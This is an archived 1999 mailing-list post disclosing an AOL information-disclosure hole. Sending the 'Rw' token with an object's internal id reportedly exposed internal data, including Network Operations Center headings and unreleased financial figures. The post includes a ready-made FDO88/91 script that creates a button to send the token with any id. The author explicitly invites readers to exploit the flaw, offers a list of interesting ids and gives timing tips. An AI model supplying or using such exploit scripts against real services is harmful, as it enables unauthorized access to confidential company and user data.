America Online Token Hole
Kevin Mack (mackk@RPI.EDU)
Thu, 8 Jul 1999 11:18:33 -0400
Normally I wouldn't post things of this nature, but I thought it was important enough. About a year ago, I found out that by sending the "Rw" token to the AOL host while signed on, along with the object's internal id as arg, any user could get detailed info about any object on the system. Included in this information is the user who created the object and tons of other information like its current viewrule and AOL url. This was all great for about a week until AOL officially fixed the hole. Normally only internal users are allowed such access for security reasons. Using this exploit, anyone can see headings in AOL's Network Operations Center and look at user count information and AOL monthly profits before they are even released. AOL put all their stuff online... Anyways, the hole still exists but is windowed for only about an hour a day. I have no clue why and it seems random... For example, yesterday, July 7th, it existed between 6:30-7:30PM EST. Here is a sample FDO88/91 that will create a button to send the Rw token w/ arg and help you exploit... fill the internal id with any number you wish to see... I do have a listing of interesting ids if anyone wants to follow this further... and good luck with the timing...
man_start_object < trigger, "" >
mat_relative_tag < 22 >
act_replace_select_action
<
uni_start_stream
sm_send_token_arg <"Rw", INTERNAL ID HERE>
uni_end_stream
>
mat_precise_x < 0 >
mat_precise_y < 226 >
mat_font_sis < small_fonts, 7, normal>
mat_art_id < 1-0-21184 >
mat_bool_default < yes >
man_end_object
comments questions.. mackk@rpi.edu
This archive was generated by hypermail 2.0b3 on Thu Jul 08 1999 - 11:40:15 CDT